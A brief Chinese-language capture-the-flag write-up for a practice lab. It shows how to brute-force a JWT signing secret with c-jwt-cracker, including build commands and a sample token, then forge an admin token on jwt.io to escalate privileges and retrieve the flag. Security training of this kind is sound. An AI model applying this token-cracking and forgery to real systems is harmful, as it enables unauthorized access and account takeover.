开启靶场
随便输入账号密码就可以登录
发现只有 admin 可以得到 flag, 在此页面抓包,发送到 repeater
使用 c-jwt-cracker 工具爆破密钥(GitHub - brendan-rius/c-jwt-cracker: JWT brute force cracker written in C)
apt-get update
apt-get install libssl-dev
make
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbiIsInJvbGUiOiJndWVzdCJ9.fkh3KN5H1bLtIVtp6cLc2Ps4i00PaONXyQDCHNnG43E
得到了“hfsp”,再来到网站(JSON Web Tokens - jwt.io)把 cookie 值放到左边,右边改成 admin 和密钥“hfsp”
然后把编码值放到 repeater 重新发包,就得到了 flag